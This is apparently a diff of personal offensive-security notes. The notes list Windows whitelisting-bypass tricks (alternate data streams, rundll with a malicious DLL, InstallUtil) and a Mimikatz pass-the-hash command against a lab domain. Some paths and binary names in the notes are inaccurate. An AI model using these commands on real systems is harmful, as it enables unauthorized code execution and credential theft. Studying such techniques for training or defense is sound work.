deletehead/the_hax/every_villain_is_LEMONS.md

 - Use an alternate data stream: `C:\path\to\writable\file.log:evil.js`
 - Check if there's a 3rd party scripting engine such as python or if JRE for java is on there
 - See if they have DLL restrictions.
 Get codexec with `rundll`: `C:\windows\system32\rundll.exe EvilDll.dll,maliciousFunc` (use `C:\Windows\SysWOW64\rundll.exe` for 64 bit payloads)
+- Use `InstallUtil` with the uninstall capability (doesn't require admin privs, but install does)

 ## Mimikatz
 You can wrap these in for ex. `PS> Invoke-Mimikatz -Command '"sekurlsa::pth /user:lemons /domain:dollarcorp.moneycorp.local /ntlm:NThashHERE /run:powershell.exe`